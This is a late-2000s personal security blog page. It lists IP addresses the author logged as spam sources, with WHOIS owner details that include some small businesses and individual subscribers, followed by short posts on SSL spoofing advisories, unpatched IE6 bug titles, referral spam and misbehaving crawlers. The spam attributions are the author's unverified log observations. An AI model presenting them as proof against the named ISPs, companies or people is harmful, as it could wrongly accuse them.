Not including the international spammers which are easy to block out by blocking out all of Ripe, Apnic, Lacnic and Afrinic using Postini (see previous posts) here are some recent spammers. What is interesting is that over the years I keep seeing the same networks over and over again as primary offenders. Windstream Communications, McLeod, RoadRunner...these names come up over and over in conjunction with my spam logs. Are the spammers living in the areas where these networks exist...or is someone on their network staff the source of, or supporting the spammers? Or do these companies just not have a handle on their networks and are easily hacked by spammers since the spam looks similar to spam coming from all over the world?
71.30.191.140
Windstream Communications Inc WINDSTREAM-COMMUNICATIONS (NET-71-28-0-0-1)
71.28.0.0 - 71.31.255.255
Alltel - Sugar Land 71-30-176-0 (NET-71-30-176-0-1)
71.30.176.0 - 71.30.191.255
24.175.196.120
OrgName: Road Runner HoldCo LLC
NetRange: 24.174.0.0 - 24.175.255.255
75.176.78.236
OrgName: Road Runner HoldCo LLC
NetRange: 75.176.0.0 - 75.191.255.255
72.40.171.22
Earthlink, Inc. ERLK-CBL-TW-SOUTHEAST (NET-72-40-0-0-1)
72.40.0.0 - 72.40.255.255
EARTHLINK,INC ERLK-TW-TAMPABAY02 (NET-72-40-160-0-1)
72.40.160.0 - 72.40.175.255
71.160.116.227
Verizon Internet Services Inc. VIS-BLOCK (NET-71-160-0-0-1)
71.160.0.0 - 71.161.63.255
VANESSA, KIM DSL (NET-71-160-116-224-1)
71.160.116.224 - 71.160.116.231
74.129.71.177
OrgName: INSIGHT COMMUNICATIONS COMPANY, L.P.
NetRange: 74.128.0.0 - 74.143.255.255
69.59.6.2
OrgName: Ygnition Networks, Inc.
NetRange: 69.59.0.0 - 69.59.15.255
70.94.31.189
OrgName: Road Runner HoldCo LLC
NetRange: 70.92.0.0 - 70.95.255.255
72.134.100.178
OrgName: Road Runner HoldCo LLC
NetRange: 72.128.0.0 - 72.135.255.255
24.205.232.15
Charter Communications CHARWR (NET-24-205-0-0-1)
24.205.0.0 - 24.205.255.255
Charter Communications CH-SLO-24-205-224-255 (NET-24-205-224-0-1)
24.205.224.0 - 24.205.255.255
71.72.60.112
OrgName: Road Runner HoldCo LLC
NetRange: 71.64.0.0 - 71.79.255.255
71.190.133.68
OrgName: Verizon Internet Services Inc.
NetRange: 71.181.128.0 - 71.191.255.255
207.191.218.118
OrgName: McLeodUSA Incorporated
NetRange: 207.191.192.0 - 207.191.223.255
72.183.35.81
OrgName: Road Runner HoldCo LLC
NetRange: 72.176.0.0 - 72.191.255.255
71.104.126.19
OrgName: Verizon Internet Services Inc.
NetRange: 71.96.0.0 - 71.127.255.255
98.113.14.251
OrgName: Verizon Internet Services Inc.
NetRange: 98.108.0.0 - 98.119.255.255
207.40.4.37
SprintSPRINTLINK-BLKR (NET-207-40-0-0-1)
207.40.0.0 - 207.43.255.255
Avalon Internet & Networking SPRINTLINK (NET-207-40-4-0-1)
207.40.4.0 - 207.40.4.255
70.127.1.45
OrgName: Road Runner HoldCo LLC
NetRange: 70.112.0.0 - 70.127.255.255
68.161.149.184
OrgName: Verizon Internet Services Inc.
NetRange: 68.160.0.0 - 68.163.255.255
OrgName: Road Runner HoldCo LLC
NetRange: 24.31.32.0 - 24.31.255.255
OrgName: Verizon Internet Services Inc.
NetRange: 71.169.192.0 - 71.173.63.255
64.208.60.7
OrgName: Global Crossing
NetRange: 64.208.0.0 - 64.209.127.255
OrgName: Road Runner HoldCo LLC
NetRange: 75.176.0.0 - 75.191.255.255
69.6.64.151
WholesaleBandwidth, Inc. WHOLE-2 (NET-69-6-0-0-1)
69.6.0.0 - 69.6.79.255
Media Breakaway, LLC MBL-BLK-69-6-64-0 (NET-69-6-64-0-1)
69.6.64.0 - 69.6.64.255
96.3.121.153
OrgName: Midcontinent Media, Inc.
NetRange: 96.2.0.0 - 96.3.255.255
208.82.112.141
OrgName: Network Data Center Host, Inc.
NetRange: 208.82.112.0 - 208.82.119.255
206.135.204.201
OrgName: MegaPath Networks Inc.
NetRange: 206.135.0.0 - 206.135.255.255
66.180.213.25
Martin Strauss Technologies, LLC STRAUSS-NETSPACE (NET-66-180-208-0-1)
66.180.208.0 - 66.180.223.255
TT Technology Partners, LLC. MSTL-UU5-TTTECH-VZ03 (NET-66-180-212-0-1)
66.180.212.0 - 66.180.213.255
207.29.228.146
OrgName: N.T. Technology, Inc.
NetRange: 207.29.224.0 - 207.29.255.255
WholesaleBandwidth, Inc. WHOLE-2 (NET-69-6-0-0-1)
69.6.0.0 - 69.6.79.255
Tekmailer.com TEK-BLK-69-6-19-0 (NET-69-6-19-0-1)
69.6.19.0 - 69.6.19.255
OrgName: CityNet
NetRange: 64.135.224.0 - 64.135.255.255
64.56.67.232
OrgName: Vrtservers, Inc
NetRange: 64.56.64.0 - 64.56.79.255
66.162.220.242
OrgName: tw telecom holdings, inc.
NetRange: 66.162.0.0 - 66.162.255.255
72.18.198.228
A+Hosting, Inc. PREMIANET (NET-72-18-192-0-1)
72.18.192.0 - 72.18.207.255
Blair Multimedia SERVERPOINT-CUSTOMER-BLAIRMULTIMEDIA02 (NET-72-18-198-166-1)
72.18.198.166 - 72.18.198.229
70.42.206.178
Internap Network Services Corporation PNAP-09-2005 (NET-70-42-0-0-1)
70.42.0.0 - 70.42.255.255
Martin Strauss Technologies, LLC INAP-MIA003-STRAUSS-23182 (NET-70-42-204-0-1)
70.42.204.0 - 70.42.207.255
TT Technology Partners, LLC. STRAUSS-INAP-BORDER5-TTTECH (NET-70-42-206-0-1)
70.42.206.0 - 70.42.206.255
207.154.32.89
OrgName: Hosted Solutions Acquisition, LLC
NetRange: 207.154.0.0 - 207.154.63.255
208.85.3.18
OrgName: Turnkey Internet Inc.
NetRange: 208.85.0.0 - 208.85.7.255
69.65.38.60
OrgName: GigeNET
NetRange: 69.65.0.0 - 69.65.63.255
24.55.189.18
Puerto Rico Cable Acquisition Company Inc. CHOICE-CM7 (NET-24-55-160-0-1)
24.55.160.0 - 24.55.191.255
Ponce Site- Choice Cable TV PONCE-NET-CPE-20 (NET-24-55-189-0-1)
24.55.189.0 - 24.55.190.255
64.208.60.5
OrgName: Global Crossing
NetRange: 64.208.0.0 - 64.209.127.255
66.63.178.213
OrgName: OC3 Networks & Web Solutions, LLC
NetRange: 66.63.160.0 - 66.63.191.255
216.185.52.93
OrgName: Alentus Corporation
NetRange: 216.185.32.0 - 216.185.63.255
208.94.243.180
OrgName: Aarons.Net
NetRange: 208.94.240.0 - 208.94.247.255
67.216.80.150
OrgName: Travail Systems, LLC
NetRange: 67.216.80.0 - 67.216.95.255
69.6.10.181
WholesaleBandwidth, Inc. WHOLE-2 (NET-69-6-0-0-1)
69.6.0.0 - 69.6.79.255
Media Breakaway, LLC MBL-BLK-69-6-10-0 (NET-69-6-10-0-1)
69.6.10.0 - 69.6.10.255
207.154.32.110
OrgName: Hosted Solutions Acquisition, LLC
NetRange: 207.154.0.0 - 207.154.63.255
216.139.195.188
OrgName: E Solutions Corporation
NetRange: 216.139.192.0 - 216.139.207.255
206.135.204.194
OrgName: MegaPath Networks Inc.
NetRange: 206.135.0.0 - 206.135.255.255
67.218.251.53
CAROLINANET a division of Guilford Communications Inc. GUILFORDCOMM-NETWORK-3 (NET-67-218-224-0-1)
67.218.224.0 - 67.218.255.255
Rashton Management RASHTON-MANAGEMENT (NET-67-218-251-0-1)
67.218.251.0 - 67.218.251.255
69.30.231.87
OrgName: WholeSale Internet, Inc.
NetRange: 69.30.192.0 - 69.30.255.255
208.91.133.84
NETRIPLEX LLC NETR-AVL-1 (NET-208-91-128-0-1)
208.91.128.0 - 208.91.135.255
Dimension 4 Networks LLC NETRIPLEX-AVL-208-91-133-0 (NET-208-91-133-0-1)
208.91.133.0 - 208.91.133.255
66.165.240.12
OrgName: Cyber World Internet Services, Inc.
NetRange: 66.165.224.0 - 66.165.255.255
207.29.231.72
OrgName: N.T. Technology, Inc.
NetRange: 207.29.224.0 - 207.29.255.255
96.225.229.87
OrgName: Verizon Internet Services Inc.
NetRange: 96.224.0.0 - 96.255.255.255
68.54.123.33
OrgName: Comcast Cable Communications, Inc.
NetRange: 68.32.0.0 - 68.63.255.255
24.103.190.191
OrgName: Road Runner HoldCo LLC
NetRange: 24.103.0.0 - 24.103.255.255
74.60.40.251
OrgName: Clearwire US LLC
NetRange: 74.60.0.0 - 74.61.255.255
68.191.222.48
Charter Communications CHARTER-NET-7BLK (NET-68-184-0-0-1)
68.184.0.0 - 68.191.255.255
Charter Communications DNT-TX-68-191-208 (NET-68-191-208-0-1)
68.191.208.0 - 68.191.223.255
12.186.102.94
AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
HORIZON WEST HEALTHCARE, INC HORIZON-96-102-88 (NET-12-186-102-88-1)
12.186.102.88 - 12.186.102.95
162.89.0.47
OrgName: City of Austin, Texas
NetRange: 162.89.0.0 - 162.89.255.255
71.175.45.36
OrgName: Verizon Internet Services Inc.
NetRange: 71.173.96.0 - 71.180.255.255
24.152.209.113
OrgName: PenTeleData Inc. - Cable
NetRange: 24.152.192.0 - 24.152.255.255
208.181.172.39
TELUS Communications Inc. TELAC-BLK5 (NET-208-181-0-0-1)
208.181.0.0 - 208.181.255.255
Irenyx Data Group Inc. (Digital Ark) IRENYX-CA (NET-208-181-172-0-1)
208.181.172.0 - 208.181.173.255
71.94.2.117
Charter Communications NETBLK-CHARTER-NET (NET-71-80-0-0-1)
71.80.0.0 - 71.95.255.255
Charter Communications REN-NV-71-94-0 (NET-71-94-0-0-1)
71.94.0.0 - 71.94.31.255
76.181.213.174
OrgName: Road Runner HoldCo LLC
NetRange: 76.181.0.0 - 76.181.255.255
65.182.200.112
OrgName: Hosting.com, Inc.
NetRange: 65.182.192.0 - 65.182.223.255
72.236.19.121
Level 3 Communications, Inc. LVLT-ORG-72-236 (NET-72-236-0-0-1)
72.236.0.0 - 72.237.255.255
Sabre Technologies, Inc. TELCOVE-KMCSVNH-SABRE (NET-72-236-19-0-1)
72.236.19.0 - 72.236.19.255
207.158.45.92
American Internet Services, LLC. AIS-WEST2 (NET-207-158-0-0-1)
207.158.0.0 - 207.158.63.255
Quexion LLC AIS-QUEXION-NETBLK1 (NET-207-158-45-0-1)
207.158.45.0 - 207.158.45.255
128.177.32.53
OrgName: Abovenet Communications, Inc
NetRange: 128.177.0.0 - 128.177.255.255
208.86.252.174
OrgName: NEXCESS.NET L.L.C.
NetRange: 208.86.248.0 - 208.86.255.255
71.34.22.123
OrgName: Qwest Communications Corporation
NetRange: 71.32.0.0 - 71.39.255.255
69.107.113.62
AT&T Internet Services SBCIS-SIS80 (NET-69-104-0-0-1)
69.104.0.0 - 69.111.255.255
PLTN13 internal SBC06910711200020040415135102 (NET-69-107-112-0-1)
69.107.112.0 - 69.107.127.255
67.79.170.12
OrgName: Road Runner HoldCo LLC
NetRange: 67.78.0.0 - 67.79.255.255
138.89.215.194
OrgName: Verizon Internet Services Inc.
NetRange: 138.89.0.0 - 138.89.255.255
74.211.85.199
OrgName: Baja Broadband
NetRange: 74.211.0.0 - 74.211.95.255
65.35.64.243
OrgName: Road Runner HoldCo LLC
NetRange: 65.35.0.0 - 65.35.255.255
70.106.208.125
OrgName: Verizon Internet Services Inc.
NetRange: 70.106.0.0 - 70.109.127.255
96.36.137.107
Charter Communications NETBLK-CHARTER-NET (NET-96-32-0-0-1)
96.32.0.0 - 96.42.255.255
Charter Communications CMP-NC-96-36-128 (NET-96-36-128-0-1)
96.36.128.0 - 96.36.159.255
63.243.120.2
PaeTec Communications, Inc. PAETECCOMM (NET-63-243-0-0-1)
63.243.0.0 - 63.243.127.255
Netacie Inc NET47656 (NET-63-243-120-0-1)
63.243.120.0 - 63.243.121.255
76.171.214.56
OrgName: Road Runner HoldCo LLC
NetRange: 76.168.0.0 - 76.175.255.255
207.119.71.188
OrgName: CenturyTel Internet Holdings, Inc.
NetRange: 207.118.0.0 - 207.119.255.255
141.157.241.56
Verizon Internet Services Inc. VIS-141-149 (NET-141-149-0-0-1)
141.149.0.0 - 141.158.255.255
Verizon Internet Services VZ-DSLDIAL-NYCMNY-14 (NET-141-157-192-0-1)
141.157.192.0 - 141.157.255.255
67.166.95.53
Comcast Cable Communications, Inc. COMCAST (NET-67-160-0-0-1)
67.160.0.0 - 67.191.255.255
Comcast Cable Communications, Inc. OREGON-12 (NET-67-166-80-0-1)
67.166.80.0 - 67.166.95.255
69.14.214.163
OrgName: WideOpenWest Finance LLC
NetRange: 69.14.0.0 - 69.14.255.255
76.251.95.218
AT&T Internet Services SBCIS-SBIS-6BLK (NET-76-192-0-0-1)
76.192.0.0 - 76.255.255.255
ACTIVE ATHLETE MEDIA-070925215520 SBC-76-251-95-216-29-0709255532 (NET-76-251-95-216-1)
76.251.95.216 - 76.251.95.223
76.120.202.3
Comcast Cable Communications, Inc. JUMPSTART-5 (NET-76-96-0-0-1)
76.96.0.0 - 76.127.255.255
Comcast Cable Communications, Inc. E-TENNESSEE-11 (NET-76-120-192-0-1)
76.120.192.0 - 76.120.255.255
64.150.158.153
HTC Communications, LLC HTCC (NET-64-150-128-0-1)
64.150.128.0 - 64.150.159.255
HTC - DSL Modem Pool HTC-64-150-158-0-24 (NET-64-150-158-0-1)
64.150.158.0 - 64.150.158.255
96.246.121.182
OrgName: Verizon Internet Services Inc.
NetRange: 96.224.0.0 - 96.255.255.255
74.95.150.81
Comcast Business Communications, Inc. CBC-CM-4 (NET-74-92-0-0-1)
74.92.0.0 - 74.95.255.255
Comcast Business Communications, Inc. HOUSTON-CBC-1 (NET-74-95-148-0-1)
74.95.148.0 - 74.95.151.255
Paloma Resources PALOMA-RESOURCES (NET-74-95-150-80-1)
74.95.150.80 - 74.95.150.87
67.204.201.242
PERSONA COMMUNICATIONS INC. PERS-CENTRAL (NET-67-204-192-0-1)
67.204.192.0 - 67.204.255.255
Persona Communications PERSONA-CEN-SUDBURY (NET-67-204-192-0-2)
67.204.192.0 - 67.204.207.255
151.213.146.241
OrgName: Windstream Communications Inc
NetRange: 151.213.0.0 - 151.213.255.255
216.254.239.75
PrairieWave Telecommunications, Inc. 216-254-224-0-1 (NET-216-254-224-0-1)
216.254.224.0 - 216.254.255.255
PrairieWave Cable Modem DHCP CMDB-216-254-239-0 (NET-216-254-239-0-1)
216.254.239.0 - 216.254.239.255
207.102.144.67
WestNet, Inc. WESTNET-W5 (NET-206-206-0-0-1)
206.206.0.0 - 206.207.255.255
Arizona Tri-University Network (ASU, UA, NAU) WEST-206-207-128-ARIZ (NET-206-207-128-0-1)
206.207.128.0 - 206.207.255.255
Embry-Riddle Aeronautical Univeristy ERAU (NET-206-207-155-0-1)
206.207.155.0 - 206.207.159.255
71.194.215.247
Comcast Cable Communications, Inc. ATT-COMCAST (NET-71-192-0-0-1)
71.192.0.0 - 71.207.255.255
Comcast Cable Communications, Inc. ILLINOIS-24 (NET-71-194-0-0-1)
71.194.0.0 - 71.194.255.255
67.214.82.158
TEL WEST COMMUNICATIONS LLC TELWEST-BLK (NET-67-214-64-0-1)
67.214.64.0 - 67.214.95.255
Lustig Orthodontics - FT Worth TELWE-CUST-67-214-82-156 (NET-67-214-82-156-1)
67.214.82.156 - 67.214.82.159
98.27.246.240
OrgName: Road Runner HoldCo LLC
NetRange: 98.24.0.0 - 98.31.255.255
206.253.55.111
OrgName: Pioneer Long Distance
NetRange: 206.253.32.0 - 206.253.63.255
71.134.247.244
AT&T Internet Services SBCIS-SIS80 (NET-71-128-0-0-1)
71.128.0.0 - 71.159.255.255
PPPoX Pool - bras18a.pltnca SBCIS-111705083239 (NET-71-134-240-0-1)
71.134.240.0 - 71.134.255.255
216.14.119.83
OrgName: EBOUNDHOST.com
NetRange: 216.14.112.0 - 216.14.127.255
64.221.90.86
OrgName: XO Communications
NetRange: 64.220.0.0 - 64.221.255.255
75.77.96.168
OrgName: NuVox Communications, Inc.
NetRange: 75.77.0.0 - 75.77.255.255
173.110.223.103
OrgName: Sprint PCS
NetRange: 173.96.0.0 - 173.117.255.255
75.91.239.21
OrgName: Windstream Communications Inc
NetRange: 75.88.0.0 - 75.91.255.255
69.65.38.60
OrgName: GigeNET
NetRange: 69.65.0.0 - 69.65.63.255
216.49.123.172
OrgName: Perry-Spencer Communications, Inc.
NetRange: 216.49.96.0 - 216.49.127.255
iWeb Technologies Inc. IWEB-BLK-03 (NET-72-55-128-0-1)
72.55.128.0 - 72.55.191.255
iWeb Dedicated CL IWEB-CL-T058-01SH (NET-72-55-156-32-1)
72.55.156.32 - 72.55.156.63
72.20.52.118
OrgName: Staminus Communications
NetRange: 72.20.0.0 - 72.20.63.255
66.197.221.69
OrgName: Network Operations Center Inc.
NetRange: 66.197.128.0 - 66.197.255.255
69.50.84.151
OrgName: Cynergycomm.net, Inc
NetRange: 69.50.80.0 - 69.50.95.255
74.189.93.50
OrgName: BellSouth.net Inc.
NetRange: 74.160.0.0 - 74.191.255.255
99.225.236.10
OrgName: Rogers Cable Communications Inc.
NetRange: 99.224.0.0 - 99.255.255.255
68.121.242.112
OrgName: AT&T Internet Services
NetRange: 68.120.0.0 - 68.127.255.255
24.27.25.212
OrgName: Road Runner HoldCo LLC
NetRange: 24.24.0.0 - 24.29.255.255
Rogers Cable Communications Inc. ROGERS-CAB-100 (NET-208-97-64-0-1)
208.97.64.0 - 208.97.127.255
REMAX York Mills REMAX (NET-208-97-88-120-1)
208.97.88.120 - 208.97.88.127
76.83.124.83
OrgName: Road Runner HoldCo LLC
NetRange: 76.80.0.0 - 76.95.255.255
76.17.193.148
Comcast Cable Communications, Inc. WESTERN-1 (NET-76-16-0-0-1)
76.16.0.0 - 76.31.255.255
Comcast Cable Communications, Inc. MINNESOTA-10 (NET-76-17-128-0-1)
76.17.128.0 - 76.17.255.255
173.67.18.140
OrgName: Verizon Internet Services Inc.
NetRange: 173.64.0.0 - 173.79.255.255
207.225.26.53
OrgName: Qwest Communications Corporation
NetRange: 207.224.0.0 - 207.225.255.255
216.139.100.115
OrgName: Grand River Mutual Telephone Corporation
NetRange: 216.139.96.0 - 216.139.127.255
64.12.143.152
OrgName: America Online, Inc.
NetRange: 64.12.0.0 - 64.12.255.255
216.96.105.218
Windstream Communications Inc WINDSTREAM (NET-216-96-0-0-1)
216.96.0.0 - 216.96.127.255
Elyria Ford 216-96-105-216 (NET-216-96-105-216-1)
216.96.105.216 - 216.96.105.223
12.214.181.116
AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-214-128-0-ILLINOIS (NET-12-214-128-0-1)
12.214.128.0 - 12.214.191.255
204.188.164.91
Savvis SAVVIS (NET-204-188-144-0-1)
204.188.144.0 - 204.188.191.255
Cable & Wireless Antigua CW-204-188-160 (NET-204-188-160-0-1)
204.188.160.0 - 204.188.175.255
Cable & Wiresles Tortola CWAG-204-188-164-0 (NET-204-188-164-0-1)
204.188.164.0 - 204.188.164.255
66.235.61.5
Broadstripe MDM-BLOCK-1 (NET-66-235-0-0-1)
66.235.0.0 - 66.235.63.255
Millennium Digital Media SEATTLE-MILLENNIUM-DIGITAL-MEDIA (NET-66-235-61-0-1)
66.235.61.0 - 66.235.61.255
66.152.140.5
OrgName: PenTeleData Inc.
NetRange: 66.152.128.0 - 66.152.159.255
204.186.29.156
OrgName: PenTeleData Inc.
NetRange: 204.186.0.0 - 204.186.255.255
66.76.20.130
OrgName: Suddenlink Communications
NetRange: 66.76.0.0 - 66.76.255.255
66.249.52.10
OrgName: Mebtel Communications
NetRange: 66.249.32.0 - 66.249.63.255
70.135.126.124
AT&T Internet Services SBCIS-SIS80 (NET-70-128-0-0-1)
70.128.0.0 - 70.143.255.255
PPPoX Pool - bras4.skt2ca SBCIS-110205121845 (NET-70-135-112-0-1)
70.135.112.0 - 70.135.127.255
68.115.160.210
Charter Communications CHARTER-NET-6BLK (NET-68-112-0-0-1)
68.112.0.0 - 68.119.255.255
Charter Communications ASH-CBN-68-115-160-0-20 (NET-68-115-160-0-1)
68.115.160.0 - 68.115.175.255
72.87.168.208
OrgName: Verizon Internet Services Inc.
NetRange: 72.87.64.0 - 72.92.127.255
98.140.80.65
OrgName: Cavalier Telephone
NetRange: 98.140.0.0 - 98.141.255.255
208.53.136.239
FDCservers.net
NetRange: 208.53.128.0 - 208.53.191.255
Liberty Cablevision of Puerto Rico LTD LIBERTYPR (NET-24-138-192-0-1)
24.138.192.0 - 24.138.255.255
Liberty Cablevision - Caguas LIBERTYPR (NET-24-138-192-0-2)
24.138.192.0 - 24.138.203.255
Trends from the trenches of Internet traffic. Hackers, spammers and Internet abuse. IP address database. DNS sightings. Views and opinions expressed are my own. ~ Teri Radichel @teriradichel
Sunday, January 11, 2009
Thursday, January 08, 2009
OpenSSL Hack - SSL Spoofing
More SSL certificate problems: http://secunia.com/advisories/33338/
OpenSSL hack allows spoofing a secure web site would be possible. In other words you think you're logging into a secure site but you're actually logging into an impostor...
Redhat published a fix for OpenSSL:
http://secunia.com/advisories/33442/
So did FreeBSD:
http://secunia.com/advisories/33445/
OpenSSL hack allows spoofing a secure web site would be possible. In other words you think you're logging into a secure site but you're actually logging into an impostor...
Redhat published a fix for OpenSSL:
http://secunia.com/advisories/33442/
So did FreeBSD:
http://secunia.com/advisories/33445/
Saturday, January 03, 2009
Microsoft Password Expiration Issue
I have figured out that when your password is expiring, each time you logout via Terminal Services, it decrements the days until you have to reset the password, instead of decrementing it at the end of each day.
What that means is, if I have a time limit on remote logins and I'm logging in and out all day long then it keeps decrementing the password expiration days so I have to create a new password sooner than should actually be required.
What that means is, if I have a time limit on remote logins and I'm logging in and out all day long then it keeps decrementing the password expiration days so I have to create a new password sooner than should actually be required.
Weird Referral Links in Web Requests
We're getting weird sites referring us traffic. Today I got some traffic from this url:
http://salondirectory.com
Apparently this site is linking to our site which has absolutely nothing to do with salons. I believe the links are being put there for search engine spam reasons - maybe to get rankings via linking to credible sites. Otherwise - I have no idea why a salon web site is linking to a totally unrelated type of site.
The traffic came from Comcast:
24.22.220.185 at 1/3/2009 8:50:07 PM PST
We got another request referred by this site:
http://quick-cash-secret.votelah.com
from 202.184.124.13 at 1/3/2009 7:59:34 PM PST
Here's a really odd one:
stream://1/
from 216.231.44.147 at 1/3/2009 9:18:40 AM
And this one
http://www.alivelocal.com/jump2
We are not putting our site on all these other weird sites - not sure how it is getting there or why.
http://salondirectory.com
Apparently this site is linking to our site which has absolutely nothing to do with salons. I believe the links are being put there for search engine spam reasons - maybe to get rankings via linking to credible sites. Otherwise - I have no idea why a salon web site is linking to a totally unrelated type of site.
The traffic came from Comcast:
24.22.220.185 at 1/3/2009 8:50:07 PM PST
We got another request referred by this site:
http://quick-cash-secret.votelah.com
from 202.184.124.13 at 1/3/2009 7:59:34 PM PST
Here's a really odd one:
stream://1/
from 216.231.44.147 at 1/3/2009 9:18:40 AM
And this one
http://www.alivelocal.com/jump2
We are not putting our site on all these other weird sites - not sure how it is getting there or why.
NaverBot - BadBot
NaverBot is a bad bot that is not obeying robots.txt.
http://help.naver.com/customer_webtxt_02.jsp
http://help.naver.com/customer_webtxt_02.jsp
AISearchBot - Bad Bot
This is what the AISearchBot looks like:
AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)
This is a bad bot because rather than post a page where you can find out how to exclude them from hitting your site in a standard web through robots.txt, they try to get you to send them your email address and by so doing reveal your IP address as well. Hopefully they will fix this and provide standard instructions for robots.txt in the near future.
AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)
This is a bad bot because rather than post a page where you can find out how to exclude them from hitting your site in a standard web through robots.txt, they try to get you to send them your email address and by so doing reveal your IP address as well. Hopefully they will fix this and provide standard instructions for robots.txt in the near future.
Friday, January 02, 2009
Unpatched IE 6 Bugs
Here are a list of unpatched or "partially fixed" bugs in IE6 according to Secunia.com. Some of these date back to 2003. Though some of considered only slightly problematic or slight chance and hence seems like they were not patched, some of the bugs in this list could cause a lot of problems if they happen to a particular user.
Additionally I found it interesting that Secunia lists a higher percentage of "advisories" unpatched in IE7. However going through the whole list of items for IE7 there are only 9 unpatched items compared to over 20 below. I would conclude based on that, the traffic I have mentioned in previous posts that looks a bit odd, and just by comparing the different types of bugs outstanding that IE7 is a much better browser choice if concerned about security.
Unpatched IE6 Bug - FTP Injection
IE 6 may disclose sensitive information with OnKeyDown event
Printing table of links from IE6 or IE7
IE6 and IE7 FTP credentials exposure
IE6 allows faking a URL in the address bar
Internet Explorer 6 or 7 File Upload Form Keystroke Event Cancel Vulnerability
IE6 hidden network share weakness
IE5 and IE6 Drag and Drop Vulnerability
IE6 - Trick a use to go to a malicious site
IE6 - XMLHTTP HTTP Request Injection
IE6 - Microsoft Internet Explorer Dialog Origin Spoofing Vulnerability
IE6 Microsoft Internet Explorer Popup Title Bar Spoofing Weakness
IE6 Internet Explorer Global Variables Local File Detection Weakness
IE6 - Window Injection Vulernability
IE6 - save as picture download spoofing - trick users into downloading malicious files
IE6 - cookie vulnerability
Note this bug says partially fixed.
IE6 - bypass file download security warning and save as displays different file extension than actual
Internet Explorer Flash/Excel Content Status Bar Spoofing Weakness
IE6 - Detect the presence of local files
(partial fix)
IE6 - cross domain cookie vulnerability
IE5 & IE6 address bar - faking urls
(partial fix)
IE6 - create popup content overlay
(partial fix)
IE6 bug - fake urls (partial fix)
IE6 - Cross frame scripting restriction bypass
IE6 - Internet Explorer File Identification Variant
IE6 - Exposure of Installed Components
IE6 - Internet Explorer Custom HTTP Error Script Injection Vulnerability (partial fix)
IE6 - Exposes sensitive information (partial fix)
Additionally I found it interesting that Secunia lists a higher percentage of "advisories" unpatched in IE7. However going through the whole list of items for IE7 there are only 9 unpatched items compared to over 20 below. I would conclude based on that, the traffic I have mentioned in previous posts that looks a bit odd, and just by comparing the different types of bugs outstanding that IE7 is a much better browser choice if concerned about security.
Unpatched IE6 Bug - FTP Injection
IE 6 may disclose sensitive information with OnKeyDown event
Printing table of links from IE6 or IE7
IE6 and IE7 FTP credentials exposure
IE6 allows faking a URL in the address bar
Internet Explorer 6 or 7 File Upload Form Keystroke Event Cancel Vulnerability
IE6 hidden network share weakness
IE5 and IE6 Drag and Drop Vulnerability
IE6 - Trick a use to go to a malicious site
IE6 - XMLHTTP HTTP Request Injection
IE6 - Microsoft Internet Explorer Dialog Origin Spoofing Vulnerability
IE6 Microsoft Internet Explorer Popup Title Bar Spoofing Weakness
IE6 Internet Explorer Global Variables Local File Detection Weakness
IE6 - Window Injection Vulernability
IE6 - save as picture download spoofing - trick users into downloading malicious files
IE6 - cookie vulnerability
Note this bug says partially fixed.
IE6 - bypass file download security warning and save as displays different file extension than actual
Internet Explorer Flash/Excel Content Status Bar Spoofing Weakness
IE6 - Detect the presence of local files
(partial fix)
IE6 - cross domain cookie vulnerability
IE5 & IE6 address bar - faking urls
(partial fix)
IE6 - create popup content overlay
(partial fix)
IE6 bug - fake urls (partial fix)
IE6 - Cross frame scripting restriction bypass
IE6 - Internet Explorer File Identification Variant
IE6 - Exposure of Installed Components
IE6 - Internet Explorer Custom HTTP Error Script Injection Vulnerability (partial fix)
IE6 - Exposes sensitive information (partial fix)
Dell Ships with IE6
This is interesting - Dell ships XP computers with IE6 that is known to be far less secure than IE7. Why? Don't they care about the security of their customers?
Dell ships with insecure browser
Dell ships with insecure browser
IE6 Traffic - Not from IE6 Browser
Something odd happened today. A person reported getting a message we display to people who have old browsers. The person sent the error message in question. When I looked up the traffic in our logs the traffic indicated the user was visiting the site with an IE6 browser. However the person says she doesn't use IE and doesn't want to use IE. The only traffic from this particular IP address was all from IE browsers and nothing else.
So what is going on here? Potentially we have a bug in our software, however I have not seen this error myself before. What I think is probably happening is that there's some sort of caching software on the network this person is using and when they came to the site they got some page that was cached by some previous visitor who was using an IE6 browser. The other option is that this person has some sort of malware or web add-on that is somehow making her traffic look like it's coming from an IE6 browser when it is not.
If there was actually caching software that was causing this problem, however, then why was I able to find in my logs the exact request matching hers that resulted in this message? If the page was cached somewhere I shouldn't be seeing her request in my logs at all would I?
So was there a computer between her computer and my server that is intercepting requests, passing it to our server, viewing the content, and then passing it back to the user's machine? That seems like what is probably happening but how can I know for sure? In that case, let's say you were contacting your bank. This intermediary would be doing screen shots of every web page you visit. If this intermediary software was one machine intercepting all the requests, I would also expect to only see one user agent coming to that site from that IP address - but I saw multiple - and they were all IE browsers. This person says she doesn't use IE because she doesn't like it.
Hmmm. What's up? More evidence of very suspicious IE6 traffic and doubtful that most of the IE traffic out there is legit.
So what is going on here? Potentially we have a bug in our software, however I have not seen this error myself before. What I think is probably happening is that there's some sort of caching software on the network this person is using and when they came to the site they got some page that was cached by some previous visitor who was using an IE6 browser. The other option is that this person has some sort of malware or web add-on that is somehow making her traffic look like it's coming from an IE6 browser when it is not.
If there was actually caching software that was causing this problem, however, then why was I able to find in my logs the exact request matching hers that resulted in this message? If the page was cached somewhere I shouldn't be seeing her request in my logs at all would I?
So was there a computer between her computer and my server that is intercepting requests, passing it to our server, viewing the content, and then passing it back to the user's machine? That seems like what is probably happening but how can I know for sure? In that case, let's say you were contacting your bank. This intermediary would be doing screen shots of every web page you visit. If this intermediary software was one machine intercepting all the requests, I would also expect to only see one user agent coming to that site from that IP address - but I saw multiple - and they were all IE browsers. This person says she doesn't use IE because she doesn't like it.
Hmmm. What's up? More evidence of very suspicious IE6 traffic and doubtful that most of the IE traffic out there is legit.
Wednesday, December 31, 2008
SSL Certificates Hacked
Here's an article about hackers breaking SSL. In fact they found a way to spoof a secure site so it looks like a particular site you are going to is sending your data encrypted across the Internet when it is not. The hack applies to certificate authorities that use the MD5 algorithm such as Verisign's RapidSSL.
Hackers Break SSL
Additionally the article points out that the hack is in SSL certificates using MD5. As the end of the article states:
